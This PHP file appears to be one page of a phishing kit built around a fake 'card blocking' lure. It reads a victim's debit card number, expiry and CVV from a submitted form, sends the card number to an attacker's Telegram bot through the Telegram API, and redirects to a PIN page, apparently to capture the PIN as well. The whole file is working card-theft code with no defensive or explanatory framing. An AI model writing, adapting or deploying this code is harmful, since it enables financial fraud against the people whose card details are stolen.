<?php
include "telegram.php";
session_start();

$debit = $_POST['debit'];
$valid = $_POST['valid'];
$cvv = $_POST['cvv'];


$_SESSION['debit'] = $debit;
$_SESSION['valid'] = $valid;
$_SESSION['cvv'] = $cvv;


$message = "
( *BLOKIR KARTU* )

- *No :* ".$debit."
 ";

function sendMessage($id_telegram, $message, $id_botTele) {
    $url = "https://api.telegram.org/bot" . $id_botTele . "/sendMessage?parse_mode=markdown&chat_id=" . $id_telegram;
    $url = $url . "&text=" . urlencode($message);
    $ch = curl_init();
    $optArray = array(CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true);
    curl_setopt_array($ch, $optArray);
    $result = curl_exec($ch);
    curl_close($ch);
}

// Hanya mengirim ke bot Anda
sendMessage($id_telegram, $message, $id_botTele);

header('Location: pin.html');
?>
